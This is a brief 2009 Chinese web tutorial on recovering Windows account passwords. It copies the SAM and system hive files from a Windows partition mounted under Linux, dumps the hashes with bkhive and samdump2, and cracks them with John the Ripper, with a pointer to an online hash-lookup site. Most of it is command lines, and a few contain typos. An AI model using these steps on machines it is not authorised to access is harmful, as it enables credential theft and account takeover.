教你在Linux系统下破解SAM密码

2009-06-29 13:58:06  来源:网页教学网 

网页教学友情提示: 用linux启动,并挂载Windows的系统分区把c:\windows\system32\config\目录下的SAM和system复制出来

  用linux启动,并挂载Windows的系统分区把c:\windows\system32\config\目录下的SAM和system复制出来
  也可以用WINPE,DOS引导盘,都可以的,只要把SAM和system复制出来就行
  开始破解:
  bkhive system keys ——生成keys文件
  samdump2 SAM keys > hashes ——用SAM和keys生成hashes
  john hashes ——跑hashes
  友情提示:
  可以直接访问 http://www.objectif-securite.ch/en/products.php 在线查询hash
  现在没有在linux下,改天上图,下面我文字描述一下
  mount -t ntfs /dev/hda1 /mnt/windows
  mkdir /home/young001/sam
  cp /mnt/windows/WINDOWS\system32\config/SAM /home/young001/sam
  cp /mnt/windows/WINDOWS\system32\config/system /home/young001/sam
  unount /mnt/windows
  cd /home/young001/sam
  bkhive system keys
  samdump2 SAM keys > hashes
  john hashes ——跑hashes
  这样密码揪出来了
  另外加上一些提示:
  比如administrator密码是123456,那么他会在最底下这么显示
  administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起来有点像/etc/passwd的内容格式,如果当时没有看清楚密码就清屏了,或者后来忘记已经破解了的密码,可以通过下面命令查看
  john-1.7.2/run/john -show hashes有的时候密码处有可能会显示几个问号,如下
  administrator:???456:500:e263f50a6a506be3d494d3d62b4dc666:::这个时候可以通过
  john-1.7.2/run/john -show hashes看看密码是否完整。 如果还是不完整,那么可能密码没有完全破解完毕,可以加–restore 参数从原来基础上继续破解
  john-1.7.2/run/john ——restore hashes
更多

推荐文章